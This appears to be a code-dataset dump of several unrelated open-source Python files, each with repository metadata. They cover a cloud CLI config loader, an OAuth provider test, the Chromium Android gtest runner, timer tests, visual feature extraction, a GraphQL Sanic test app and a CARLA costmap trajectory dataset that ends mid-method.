cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
else:
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output]:
if param in conf:
g_param[param] = conf[param]
else:
raise ConfigurationError("%s is invalid" % param)
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["cloudhsm"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["cloudhsm"][OptionsDefine.Endpoint]
except Exception as err:
raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return g_param
| 41.629108 | 105 | 0.71924 |
497b41d573fe318423e88053194d710303174585
| 617 |
py
|
Python
|
allauth/socialaccount/providers/pinterest/tests.py
|
joebos/django-allauth
|
cb624a2fe659e58ea343b9b16159427ce38aff69
|
[
"MIT"
] | null | null | null |
allauth/socialaccount/providers/pinterest/tests.py
|
joebos/django-allauth
|
cb624a2fe659e58ea343b9b16159427ce38aff69
|
[
"MIT"
] | null | null | null |
allauth/socialaccount/providers/pinterest/tests.py
|
joebos/django-allauth
|
cb624a2fe659e58ea343b9b16159427ce38aff69
|
[
"MIT"
] | null | null | null |
from allauth.socialaccount.tests import create_oauth2_tests
from allauth.tests import MockedResponse
from allauth.socialaccount.providers import registry
from .provider import PinterestProvider
class PinterestTests(create_oauth2_tests(
registry.by_id(PinterestProvider.id))):
def get_mocked_response(self):
return MockedResponse(200, """
{
"emailAddress": "[email protected]",
"firstName": "Raymond",
"id": "ZLARGMFT1M",
"lastName": "Penners",
"pictureUrl": "http://m.c.lnkd.licdn.com/mpr/mprx/0_e0hbvSLc",
"publicProfileUrl": "http://www.pinterest.com/in/intenct"
}
""")
| 28.045455 | 64 | 0.742301 |
3ce93d16336e8e5b4da7ab0bb668030f9f2c50ae
| 7,059 |
py
|
Python
|
build/android/pylib/gtest/local_device_gtest_run.py
|
kjthegod/chromium
|
cf940f7f418436b77e15b1ea23e6fa100ca1c91a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 |
2019-11-28T10:46:52.000Z
|
2019-11-28T10:46:52.000Z
|
build/android/pylib/gtest/local_device_gtest_run.py
|
kjthegod/chromium
|
cf940f7f418436b77e15b1ea23e6fa100ca1c91a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
build/android/pylib/gtest/local_device_gtest_run.py
|
kjthegod/chromium
|
cf940f7f418436b77e15b1ea23e6fa100ca1c91a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2 |
2015-03-27T11:15:39.000Z
|
2016-08-17T14:19:56.000Z
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
from pylib import constants
from pylib import ports
from pylib.base import test_run
from pylib.device import device_errors
from pylib.gtest import gtest_test_instance
from pylib.local import local_test_server_spawner
from pylib.local.device import local_device_environment
from pylib.local.device import local_device_test_run
from pylib.utils import apk_helper
from pylib.utils import device_temp_file
_COMMAND_LINE_FLAGS_SUPPORTED = True
_EXTRA_COMMAND_LINE_FILE = (
'org.chromium.native_test.ChromeNativeTestActivity.CommandLineFile')
_EXTRA_COMMAND_LINE_FLAGS = (
'org.chromium.native_test.ChromeNativeTestActivity.CommandLineFlags')
_MAX_SHARD_SIZE = 256
# TODO(jbudorick): Move this up to the test instance if the net test server is
# handled outside of the APK for the remote_device environment.
_SUITE_REQUIRES_TEST_SERVER_SPAWNER = [
'content_unittests', 'content_browsertests', 'net_unittests', 'unit_tests'
]
class _ApkDelegate(object):
def __init__(self, apk):
self._apk = apk
self._package = apk_helper.GetPackageName(self._apk)
self._runner = apk_helper.GetInstrumentationName(self._apk)
self._component = '%s/%s' % (self._package, self._runner)
def Install(self, device):
device.Install(self._apk)
def RunWithFlags(self, device, flags, **kwargs):
with device_temp_file.DeviceTempFile(device.adb) as command_line_file:
device.WriteFile(command_line_file.name, '_ %s' % flags)
return device.StartInstrumentation(
self._component,
extras={_EXTRA_COMMAND_LINE_FILE: command_line_file.name},
raw=False,
**kwargs)
def Clear(self, device):
device.ClearApplicationState(self._package)
class _ExeDelegate(object):
def __init__(self, exe, tr):
self._exe_host_path = exe
self._exe_file_name = os.path.split(exe)[-1]
self._exe_device_path = '%s/%s' % (
constants.TEST_EXECUTABLE_DIR, self._exe_file_name)
deps_host_path = self._exe_host_path + '_deps'
if os.path.exists(deps_host_path):
self._deps_host_path = deps_host_path
self._deps_device_path = self._exe_device_path + '_deps'
else:
self._deps_host_path = None
self._test_run = tr
def Install(self, device):
# TODO(jbudorick): Look into merging this with normal data deps pushing if
# executables become supported on nonlocal environments.
host_device_tuples = [(self._exe_host_path, self._exe_device_path)]
if self._deps_host_path:
host_device_tuples.append((self._deps_host_path, self._deps_device_path))
device.PushChangedFiles(host_device_tuples)
def RunWithFlags(self, device, flags, **kwargs):
cmd = [
self._test_run.GetTool(device).GetTestWrapper(),
self._exe_device_path,
flags,
]
cwd = constants.TEST_EXECUTABLE_DIR
env = {
'LD_LIBRARY_PATH':
'%s/%s_deps' % (constants.TEST_EXECUTABLE_DIR, self._exe_file_name),
}
try:
gcov_strip_depth = os.environ['NATIVE_COVERAGE_DEPTH_STRIP']
external = device.GetExternalStoragePath()
env['GCOV_PREFIX'] = '%s/gcov' % external
env['GCOV_PREFIX_STRIP'] = gcov_strip_depth
except (device_errors.CommandFailedError, KeyError):
pass
# TODO(jbudorick): Switch to just RunShellCommand once perezju@'s CL
# for long shell commands lands.
with device_temp_file.DeviceTempFile(device.adb) as script_file:
script_contents = ' '.join(cmd)
logging.info('script contents: %r' % script_contents)
device.WriteFile(script_file.name, script_contents)
output = device.RunShellCommand(['sh', script_file.name], cwd=cwd,
env=env, **kwargs)
return output
def Clear(self, device):
try:
device.KillAll(self._exe_file_name, blocking=True, timeout=30, retries=0)
except device_errors.CommandFailedError:
# Raised if there is no process with the given name, which in this case
# is all we care about.
pass
class LocalDeviceGtestRun(local_device_test_run.LocalDeviceTestRun):
def __init__(self, env, test_instance):
assert isinstance(env, local_device_environment.LocalDeviceEnvironment)
assert isinstance(test_instance, gtest_test_instance.GtestTestInstance)
super(LocalDeviceGtestRun, self).__init__(env, test_instance)
if self._test_instance.apk:
self._delegate = _ApkDelegate(self._test_instance.apk)
elif self._test_instance.exe:
self._delegate = _ExeDelegate(self, self._test_instance.exe)
self._servers = {}
#override
def TestPackage(self):
return self._test_instance._suite
#override
def SetUp(self):
def individual_device_set_up(dev, host_device_tuples):
# Install test APK.
self._delegate.Install(dev)
# Push data dependencies.
external_storage = dev.GetExternalStoragePath()
host_device_tuples = [
(h, d if d is not None else external_storage)
for h, d in host_device_tuples]
dev.PushChangedFiles(host_device_tuples)
self._servers[str(dev)] = []
if self.TestPackage() in _SUITE_REQUIRES_TEST_SERVER_SPAWNER:
self._servers[str(dev)].append(
local_test_server_spawner.LocalTestServerSpawner(
ports.AllocateTestServerPort(), dev, self.GetTool(dev)))
for s in self._servers[str(dev)]:
s.SetUp()
self._env.parallel_devices.pMap(individual_device_set_up,
self._test_instance.GetDataDependencies())
#override
def _ShouldShard(self):
return True
#override
def _CreateShards(self, tests):
device_count = len(self._env.devices)
shards = []
for i in xrange(0, device_count):
unbounded_shard = tests[i::device_count]
shards += [unbounded_shard[j:j+_MAX_SHARD_SIZE]
for j in xrange(0, len(unbounded_shard), _MAX_SHARD_SIZE)]
return [':'.join(s) for s in shards]
#override
def _GetTests(self):
tests = self._delegate.RunWithFlags(
self._env.devices[0], '--gtest_list_tests')
tests = gtest_test_instance.ParseGTestListTests(tests)
tests = self._test_instance.FilterTests(tests)
return tests
#override
def _RunTest(self, device, test):
# Run the test.
output = self._delegate.RunWithFlags(device, '--gtest_filter=%s' % test,
timeout=900, retries=0)
for s in self._servers[str(device)]:
s.Reset()
self._delegate.Clear(device)
# Parse the output.
# TODO(jbudorick): Transition test scripts away from parsing stdout.
results = self._test_instance.ParseGTestOutput(output)
return results
#override
def TearDown(self):
def individual_device_tear_down(dev):
for s in self._servers[str(dev)]:
s.TearDown()
self._env.parallel_devices.pMap(individual_device_tear_down)
| 33.77512 | 79 | 0.710582 |
3d8dbc633affb92750227abbfd47d9f2008eb4ae
| 1,325 |
py
|
Python
|
lib/timers_test.py
|
jakerogerz/glazier
|
10ee390e79c5fe65933a2699da851e27c03f8c60
|
[
"Apache-2.0"
] | null | null | null |
lib/timers_test.py
|
jakerogerz/glazier
|
10ee390e79c5fe65933a2699da851e27c03f8c60
|
[
"Apache-2.0"
] | null | null | null |
lib/timers_test.py
|
jakerogerz/glazier
|
10ee390e79c5fe65933a2699da851e27c03f8c60
|
[
"Apache-2.0"
] | 1 |
2019-11-25T10:56:20.000Z
|
2019-11-25T10:56:20.000Z
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for glazier.lib.timers."""
import datetime
from glazier.lib import timers
import mock
import unittest
class TimersTest(unittest.TestCase):
def setUp(self):
self.t = timers.Timers()
@mock.patch.object(timers.datetime, 'datetime', autospec=True)
def testNow(self, dt):
now = datetime.datetime.utcnow()
dt.utcnow.return_value = now
self.assertEqual(self.t.Now(), now)
def testGetAll(self):
time_2 = datetime.datetime.now()
self.t.Set('timer_1')
self.t.Set('timer_2', at_time=time_2)
self.assertEqual(self.t.Get('timer_2'), time_2)
all_t = self.t.GetAll()
self.assertIn('timer_1', all_t)
self.assertIn('timer_2', all_t)
if __name__ == '__main__':
unittest.main()
| 29.444444 | 74 | 0.722264 |
69ee73633de7d6ecb6e3c3d8a417e05a459ec99d
| 3,516 |
py
|
Python
|
src/fonduer/features/feature_libs/visual_features.py
|
Prabh06/fonduer
|
c376dfb31f0595b7fe992e9ae7eaf23397125d65
|
[
"MIT"
] | null | null | null |
src/fonduer/features/feature_libs/visual_features.py
|
Prabh06/fonduer
|
c376dfb31f0595b7fe992e9ae7eaf23397125d65
|
[
"MIT"
] | null | null | null |
src/fonduer/features/feature_libs/visual_features.py
|
Prabh06/fonduer
|
c376dfb31f0595b7fe992e9ae7eaf23397125d65
|
[
"MIT"
] | null | null | null |
from fonduer.candidates.models import TemporarySpan
from fonduer.utils.data_model_utils import (
get_visual_aligned_lemmas,
is_horz_aligned,
is_vert_aligned,
is_vert_aligned_center,
is_vert_aligned_left,
is_vert_aligned_right,
same_page,
)
FEAT_PRE = "VIZ_"
DEF_VALUE = 1
unary_vizlib_feats = {}
binary_vizlib_feats = {}
def get_visual_feats(candidates):
candidates = candidates if isinstance(candidates, list) else [candidates]
for candidate in candidates:
args = tuple([arg.span for arg in candidate.get_contexts()])
if not (isinstance(args[0], TemporarySpan)):
raise ValueError(
"Accepts Span-type arguments, %s-type found." % type(candidate)
)
# Unary candidates
if len(args) == 1:
span = args[0]
# Add VisualLib entity features (if applicable)
if span.sentence.is_visual():
if span.stable_id not in unary_vizlib_feats:
unary_vizlib_feats[span.stable_id] = set()
for f, v in vizlib_unary_features(span):
unary_vizlib_feats[span.stable_id].add((f, v))
for f, v in unary_vizlib_feats[span.stable_id]:
yield candidate.id, FEAT_PRE + f, v
# Binary candidates
elif len(args) == 2:
span1, span2 = args
# Add VisualLib entity features (if applicable)
if span1.sentence.is_visual() or span2.sentence.is_visual():
for span, pre in [(span1, "e1_"), (span2, "e2_")]:
if span.stable_id not in unary_vizlib_feats:
unary_vizlib_feats[span.stable_id] = set()
for f, v in vizlib_unary_features(span):
unary_vizlib_feats[span.stable_id].add((f, v))
for f, v in unary_vizlib_feats[span.stable_id]:
yield candidate.id, FEAT_PRE + pre + f, v
if candidate.id not in binary_vizlib_feats:
binary_vizlib_feats[candidate.id] = set()
for f, v in vizlib_binary_features(span1, span2):
binary_vizlib_feats[candidate.id].add((f, v))
for f, v in binary_vizlib_feats[candidate.id]:
yield candidate.id, FEAT_PRE + f, v
else:
raise NotImplementedError(
"Only handles unary and binary candidates currently"
)
def vizlib_unary_features(span):
"""
Visual-related features for a single span
"""
if not span.sentence.is_visual():
return
for f in get_visual_aligned_lemmas(span):
yield "ALIGNED_" + f, DEF_VALUE
for page in set(span.get_attrib_tokens("page")):
yield "PAGE_[%d]" % page, DEF_VALUE
def vizlib_binary_features(span1, span2):
"""
Visual-related features for a pair of spans
"""
if same_page((span1, span2)):
yield "SAME_PAGE", DEF_VALUE
if is_horz_aligned((span1, span2)):
yield "HORZ_ALIGNED", DEF_VALUE
if is_vert_aligned((span1, span2)):
yield "VERT_ALIGNED", DEF_VALUE
if is_vert_aligned_left((span1, span2)):
yield "VERT_ALIGNED_LEFT", DEF_VALUE
if is_vert_aligned_right((span1, span2)):
yield "VERT_ALIGNED_RIGHT", DEF_VALUE
if is_vert_aligned_center((span1, span2)):
yield "VERT_ALIGNED_CENTER", DEF_VALUE
| 34.135922 | 79 | 0.595563 |
f5a74cfcbf5a3c58f466d9bd1ca84e6a913671e9
| 600 |
py
|
Python
|
tests/sanic/app.py
|
messa/graphql-server
|
f5e8302d1320b013b441844df059e90ae83d04a0
|
[
"MIT"
] | null | null | null |
tests/sanic/app.py
|
messa/graphql-server
|
f5e8302d1320b013b441844df059e90ae83d04a0
|
[
"MIT"
] | 2 |
2019-05-15T20:33:39.000Z
|
2019-05-15T22:44:22.000Z
|
tests/sanic/app.py
|
messa/graphql-server
|
f5e8302d1320b013b441844df059e90ae83d04a0
|
[
"MIT"
] | 2 |
2019-05-15T18:58:21.000Z
|
2019-06-30T09:56:11.000Z
|
from urllib.parse import urlencode
from sanic import Sanic
from sanic.testing import SanicTestClient
from graphql_server.sanic import GraphQLView
from .schema import Schema
def create_app(path="/graphql", **kwargs):
app = Sanic(__name__)
app.debug = True
schema = kwargs.pop("schema", None) or Schema
app.add_route(GraphQLView.as_view(schema=schema, **kwargs), path)
app.client = SanicTestClient(app)
return app
def url_string(uri="/graphql", **url_params):
string = "/graphql"
if url_params:
string += "?" + urlencode(url_params)
return string
| 20.689655 | 69 | 0.705 |
e422711132c3cb2156f113d5ac2ea1acdeaeb716
| 36,434 |
py
|
Python
|
costmap_dataset.py
|
Czworldy/GP_traj
|
96261f39a5a322092e3a6be98938bb4601f0f746
|
[
"MIT"
] | 1 |
2021-06-08T06:09:55.000Z
|
2021-06-08T06:09:55.000Z
|
costmap_dataset.py
|
Czworldy/GP_traj
|
96261f39a5a322092e3a6be98938bb4601f0f746
|
[
"MIT"
] | null | null | null |
costmap_dataset.py
|
Czworldy/GP_traj
|
96261f39a5a322092e3a6be98938bb4601f0f746
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import glob
import random
import numpy as np
from PIL import Image
import torch
from torch.utils.data import Dataset
import torchvision.transforms as transforms
import copy
from scipy.special import comb
np.set_printoptions(suppress=True, precision=4, linewidth=65535)
import matplotlib.pyplot as plt
def expand_control_points(point_array):
point_array_expand = copy.deepcopy(point_array)
size = point_array.shape[1]
assert size >= 3
for i in range(1,size-3):
p0, p1, p2 = point_array[:,i], point_array[:,i+1], point_array[:,i+2]
norm1, norm2 = np.linalg.norm(p0-p1), np.linalg.norm(p2-p1)
pc = p1 - 0.5*np.sqrt(norm1*norm2)*((p0-p1)/norm1 + (p2-p1)/norm2)
point_array_expand[:,i+1] = pc
return point_array_expand
def bernstein(t, i, n):
return comb(n,i) * t**i * (1-t)**(n-i)
def bezier_curve(t, point_array, bias=0):
t = np.clip(t, 0, 1)
n = point_array.shape[1]-1
p = np.array([0.,0.]).reshape(2,1)
size = len(t) if isinstance(t, np.ndarray) else 1
p = np.zeros((2, size))
new_point_array = np.diff(point_array, n=bias, axis=1)
for i in range(n+1-bias):
p += new_point_array[:,i][:,np.newaxis] * bernstein(t, i, n-bias) * n**bias
return p
class Bezier(object):
def __init__(self, time_list, x_list, y_list, v0, vf=(0.000001,0.000001)):
t0, x0, y0 = time_list[0], x_list[0], y_list[0]
t_span = time_list[-1] - time_list[0]
time_array = np.array(time_list)
x_array, y_array = np.array(x_list), np.array(y_list)
time_array -= t0
x_array -= x0
y_array -= y0
time_array /= t_span
point_array = np.vstack((x_array, y_array))
n = point_array.shape[1]+1
v0, vf = np.array(v0), np.array(vf)
p0 = point_array[:, 0] + v0/n
pf = point_array[:,-1] - vf/n
point_array = np.insert(point_array, 1, values=p0, axis=1)
point_array = np.insert(point_array,-1, values=pf, axis=1)
point_array_expand = expand_control_points(point_array)
self.t0, self.t_span = t0, t_span
self.x0, self.y0 = x0, y0
self.p0 = np.array([x0, y0]).reshape(2,1)
self.point_array = point_array
self.point_array_expand = point_array_expand
def position(self, time, expand=True):
time = np.clip(time, self.t0, self.t0+self.t_span)
t = (time - self.t0) / self.t_span
p = self.point_array_expand if expand else self.point_array
position = bezier_curve(t, p, bias=0)
return position + self.p0
def velocity(self, time, expand=True):
time = np.clip(time, self.t0, self.t0+self.t_span)
t = (time - self.t0) / self.t_span
p = self.point_array_expand if expand else self.point_array
return bezier_curve(t, p, bias=1)
def acc(self, time, expand=True):
time = np.clip(time, self.t0, self.t0+self.t_span)
t = (time - self.t0) / self.t_span
p = self.point_array_expand if expand else self.point_array
return bezier_curve(t, p, bias=2)
def angle_normal(angle):
while angle >= np.pi:
angle -= 2*np.pi
while angle <= -np.pi:
angle += 2*np.pi
return angle
def xy2uv(x, y):
pixs_per_meter = 200./25.
u = (200-x*pixs_per_meter).astype(int)
v = (y*pixs_per_meter+400//2).astype(int)
#mask = np.where((u >= 0)&(u < 200))[0]
return u, v
class CostMapDataset(Dataset):
def __init__(self, data_index, opt, dataset_path='/media/wang/DATASET/CARLA/town01/', evalmode=False):
self.evalmode = evalmode
self.data_index = data_index
self.weights = []
self.max_dist = opt.max_dist
self.max_t = opt.max_t
self.img_step = opt.img_step
transforms_ = [ transforms.Resize((200, 400), Image.BICUBIC),
transforms.ToTensor(),
transforms.Normalize((0.5), (0.5)),
]
self.transform = transforms.Compose(transforms_)
self.dataset_path = dataset_path
self.pose_dict = {}
self.vel_dict = {}
self.acc_dict = {}
self.files_dict = {}
self.total_len = 0
self.eval_index = None # eval mode
self.eval_cnt = 0 # eval mode
for index in self.data_index:
self.read_pose(index)
self.read_vel(index)
self.read_acc(index)
self.read_img(index)
self.weights.append(len(self.files_dict[index]))
def read_pose(self, index):
file_path = self.dataset_path+str(index)+'/state/pos.txt'
ts_dict = {}
with open(file_path, 'r') as file:
lines = file.readlines()
for line in lines:
sp_line = line.split()
ts = sp_line[0]
x = float(sp_line[1])
y = float(sp_line[2])
z = float(sp_line[3])
yaw = float(sp_line[5])
ts_dict[ts] = [x, y, z, yaw]
self.pose_dict[index] = ts_dict
def read_vel(self, index):
file_path = self.dataset_path+str(index)+'/state/vel.txt'
ts_dict = {}
with open(file_path, 'r') as file:
lines = file.readlines()
for line in lines:
sp_line = line.split()
ts = sp_line[0]
vx = float(sp_line[1])
vy = float(sp_line[2])
vz = float(sp_line[3])
ts_dict[ts] = [vx, vy, vz]
self.vel_dict[index] = ts_dict
def read_acc(self, index):
file_path = self.dataset_path+str(index)+'/state/acc.txt'
ts_dict = {}
with open(file_path, 'r') as file:
lines = file.readlines()
for line in lines:
sp_line = line.split()
ts = sp_line[0]
ax = float(sp_line[1])
ay = float(sp_line[2])
az = float(sp_line[3])
ts_dict[ts] = [ax, ay, az]
self.acc_dict[index] = ts_dict
def read_img(self, index):
files = glob.glob(self.dataset_path+str(index)+'/ipm/*.png')
file_names = []
for file in files:
file_name = file.split('/')[-1][:-4]
file_names.append(file_name)
file_names.sort()
self.files_dict[index] = file_names
def tf_pose(self, data_index, ts, yaw, x_0, y_0):
x_t = self.pose_dict[data_index][ts][0]
y_t = self.pose_dict[data_index][ts][1]
dx = x_t - x_0
dy = y_t - y_0
x = np.cos(yaw)*dx + np.sin(yaw)*dy
y = np.cos(yaw)*dy - np.sin(yaw)*dx
return x, y
def __getitem__(self, index):
while True:
if self.evalmode:
if self.eval_index == None:
self.eval_index = random.sample(self.data_index,1)[0]
self.cnt = 300
data_index = self.eval_index
file_name = self.files_dict[data_index][self.cnt]
self.cnt += 20
if self.cnt > len(self.files_dict[data_index])-50:
self.eval_index = random.sample(self.data_index,1)[0]
self.cnt = 300
else:
data_index = random.choices(self.data_index, self.weights)[0]
file_name = random.sample(self.files_dict[data_index][300:-120], 1)[0]
ts_index = self.files_dict[data_index].index(file_name)
imgs = []
try:
for i in range(-9,1):
_file_name = self.files_dict[data_index][ts_index + self.img_step*i]
image_path = self.dataset_path + str(data_index)+'/ipm/'+_file_name+'.png'
img = Image.open(image_path).convert('L')
img = self.transform(img)
imgs.append(img)
except:
print('get img error')
continue
imgs = torch.stack(imgs)
x_0 = self.pose_dict[data_index][file_name][0]
y_0 = self.pose_dict[data_index][file_name][1]
yaw = np.deg2rad(self.pose_dict[data_index][file_name][3])
ts_list = []
relative_t_list = []
x_list = []
y_list = []
vx_list = []
vy_list = []
ax_list = []
ay_list = []
a_list = []
collision_flag = False
collision_x = None
collision_y = None
collision_index = None
for i in range(ts_index, len(self.files_dict[data_index])-100):
ts = self.files_dict[data_index][i]
if float(ts)-float(file_name) > self.max_t:
break
else:
x_, y_ = self.tf_pose(data_index, ts, yaw, x_0, y_0)
u, v = xy2uv(x_, y_)
if not collision_flag and u >= 0 and u < 200 and v >=0 and v < 400:
if imgs[-1][0][u][v] < -0.3:
collision_flag = True
collision_x = x_
collision_y = y_
collision_index = i
#break
if collision_flag:
x_list.append(collision_x)
y_list.append(collision_y)
vx = 0.
vy = 0.
a = 0.
a_list.append(0.)
vx_list.append(0.)
vy_list.append(0.)
ax_list.append(0.)
ay_list.append(0.)
ts_list.append(ts)
relative_t_list.append(float(ts)-float(file_name))
else:
x_list.append(x_)
y_list.append(y_)
vx_ = self.vel_dict[data_index][ts][0]
vy_ = self.vel_dict[data_index][ts][1]
vx = np.cos(yaw)*vx_ + np.sin(yaw)*vy_
vy = np.cos(yaw)*vy_ - np.sin(yaw)*vx_
ax_ = self.acc_dict[data_index][ts][0]
ay_ = self.acc_dict[data_index][ts][1]
ax = ax_*np.cos(yaw) + ay_*np.sin(yaw)
ay = ay_*np.cos(yaw) - ax_*np.sin(yaw)
ax_list.append(ax)
ay_list.append(ay)
theta_a = np.arctan2(ay, ax)
theta_v = np.arctan2(vy, vx)
sign = np.sign(np.cos(theta_a-theta_v))
a = sign*np.sqrt(ax*ax + ay*ay)
a_list.append(a)
vx_list.append(vx)
vy_list.append(vy)
ts_list.append(ts)
relative_t_list.append(float(ts)-float(file_name))
####################
if collision_flag:
a_brake = 10
start_index = collision_index - ts_index
brake_index = 0
for i in range(start_index):
x_i = x_list[start_index-i]
y_i = y_list[start_index-i]
safe_dist = np.sqrt((x_i-collision_x)**2+(y_i-collision_y)**2)
vx_i = vx_list[start_index-i]
vy_i = vy_list[start_index-i]
v2 = vx_i**2+vy_i**2
brake_dist = v2/(2*a_brake)
if brake_dist < safe_dist:
brake_index = start_index - i
break
bz_ts = [float(item) for item in ts_list[brake_index:start_index]]
if len(bz_ts) > 2:
bz_x = [x_list[brake_index], collision_x]
bz_y = [y_list[brake_index], collision_y]
bz_vx = vx_list[brake_index]
bz_vy = vy_list[brake_index]
#print(bz_ts)
bezier = Bezier(bz_ts, bz_x, bz_y, v0=(bz_vx, bz_vy))
sample_number = len(bz_ts)
time_array = np.linspace(bezier.t0, bezier.t0+bezier.t_span, sample_number)
#print(time_array)
position_array = bezier.position(time_array, expand=True)
velocity_array = bezier.velocity(time_array, expand=True)
acc_array = bezier.acc(time_array, expand=True)
new_x = position_array[0,:]
new_y = position_array[1,:]
new_vx = velocity_array[0,:]
new_vy = velocity_array[1,:]
new_ax = acc_array[0,:]
new_ay = acc_array[1,:]
for i in range(start_index-brake_index):
x_list[brake_index+i] = new_x[i]
y_list[brake_index+i] = new_y[i]
vx_list[brake_index+i] = new_vx[i]
vy_list[brake_index+i] = new_vy[i]
ax_list[brake_index+i] = new_ax[i]
ay_list[brake_index+i] = new_ay[i]
a_list[brake_index+i] = -np.sqrt(new_ax[i]**2+new_ay[i]**2)
ts_list[brake_index+i] = str(time_array[i])
relative_t_list[brake_index+i] = time_array[i] - float(file_name)
#relative_t_list.append(float(ts)-float(file_name))
####################
if len(ts_list) == 0:
continue
else:
ts = random.sample(ts_list, 1)[0]
ts_index = ts_list.index(ts)
#weights = [np.exp(-0.23*(float(ts)-float(file_name))) for ts in ts_list]
#sample_ts = random.choices(ts_list, weights)[0]
#print(weights/sum(weights))
break
#ts = sample_ts
# [0 ~ 1]
t = torch.FloatTensor([float(ts)/self.max_t - float(file_name)/self.max_t])
# v0
_vx_0 = self.vel_dict[data_index][file_name][0]
_vy_0 = self.vel_dict[data_index][file_name][1]
v_0 = np.sqrt(_vx_0*_vx_0 + _vy_0*_vy_0)
v_0 = torch.FloatTensor([v_0])
x = x_list[ts_index]
y = y_list[ts_index]
xy = torch.FloatTensor([x/self.max_dist, y/self.max_dist])# [-1, 1]
# vx, vy
vx = vx_list[ts_index]
vy = vy_list[ts_index]
# ax, ay
ax = ax_list[ts_index]
ay = ax_list[ts_index]
a = a_list[ts_index]
a = torch.FloatTensor([a])
"""
if collision_flag and float(ts) >= float(collision_t):
ts = collision_t
# x, y
x, y = self.tf_pose(data_index, ts, yaw, x_0, y_0)
xy = torch.FloatTensor([x/self.max_dist, y/self.max_dist])# [-1, 1]
# vx, vy
vx = 0
vy = 0
# ax, ay
ax = 0
ay = 0
a = 0
a = torch.FloatTensor([a])
else:
# x, y
x, y = self.tf_pose(data_index, ts, yaw, x_0, y_0)
xy = torch.FloatTensor([x/self.max_dist, y/self.max_dist])# [-1, 1]
# vx, vy
_vx = self.vel_dict[data_index][ts][0]
_vy = self.vel_dict[data_index][ts][1]
vx = np.cos(yaw)*_vx + np.sin(yaw)*_vy
vy = np.cos(yaw)*_vy - np.sin(yaw)*_vx
# ax, ay
_ax = self.acc_dict[data_index][ts][0]
_ay = self.acc_dict[data_index][ts][1]
ax = _ax*np.cos(yaw) + _ay*np.sin(yaw)
ay = _ay*np.cos(yaw) - _ax*np.sin(yaw)
theta_a = np.arctan2(_ay, _ax)
theta_v = np.arctan2(_vy, _vx)
sign = np.sign(np.cos(theta_a-theta_v))
a = sign*np.sqrt(ax*ax + ay*ay)
a = torch.FloatTensor([a])
"""
vxy = torch.FloatTensor([vx, vy])
axy = torch.FloatTensor([ax, ay])
x_list = torch.FloatTensor(x_list)
y_list = torch.FloatTensor(y_list)
vx_list = torch.FloatTensor(vx_list)
vy_list = torch.FloatTensor(vy_list)
a_list = torch.FloatTensor(a_list)
relative_t_list = torch.FloatTensor(relative_t_list)
if self.evalmode:
return {'img': imgs, 't': t, 'xy':xy, 'vxy':vxy, 'axy':axy, 'a':a, 'v_0':v_0,
'a_list':a_list,
'x_list':x_list, 'y_list':y_list,
'vx_list':vx_list, 'vy_list':vy_list,
'ts_list':relative_t_list}
else:
return {'img': imgs, 't': t, 'xy':xy, 'vxy':vxy, 'axy':axy, 'a':a, 'v_0':v_0}
def __len__(self):
return 100000000000
class CostMapDataset2(CostMapDataset):
def __init__(self, data_index, opt, dataset_path='/media/wang/DATASET/CARLA/town01/', evalmode=False):
self.traj_steps = 8
self.evalmode = evalmode
self.data_index = data_index
self.weights = []
self.max_dist = opt.max_dist
self.max_t = opt.max_t
self.img_step = opt.img_step
transforms_ = [ transforms.Resize((200, 400), Image.BICUBIC),
transforms.ToTensor(),
transforms.Normalize((0.5), (0.5)),
]
self.transform = transforms.Compose(transforms_)
self.dataset_path = dataset_path
self.pose_dict = {}
self.vel_dict = {}
self.acc_dict = {}
self.files_dict = {}
self.total_len = 0
self.eval_index = None # eval mode
self.eval_cnt = 0 # eval mode
for index in self.data_index:
self.read_pose(index)
self.read_vel(index)
self.read_acc(index)
self.read_img(index)
self.weights.append(len(self.files_dict[index]))
def __getitem__(self, index):
while True:
if self.evalmode:
if self.eval_index == None:
self.eval_index = random.sample(self.data_index,1)[0]
self.cnt = 300
data_index = self.eval_index
file_name = self.files_dict[data_index][self.cnt]
self.cnt += 20
if self.cnt > len(self.files_dict[data_index])-50:
self.eval_index = random.sample(self.data_index,1)[0]
self.cnt = 300
else:
data_index = random.choices(self.data_index, self.weights)[0]
file_name = random.sample(self.files_dict[data_index][300:-120], 1)[0]
ts_index = self.files_dict[data_index].index(file_name)
imgs = []
try:
for i in range(-9,1):
_file_name = self.files_dict[data_index][ts_index + self.img_step*i]
image_path = self.dataset_path + str(data_index)+'/ipm/'+_file_name+'.png'
img = Image.open(image_path).convert('L')
img = self.transform(img)
imgs.append(img)
except:
print('get img error:', image_path)
continue
imgs = torch.stack(imgs)
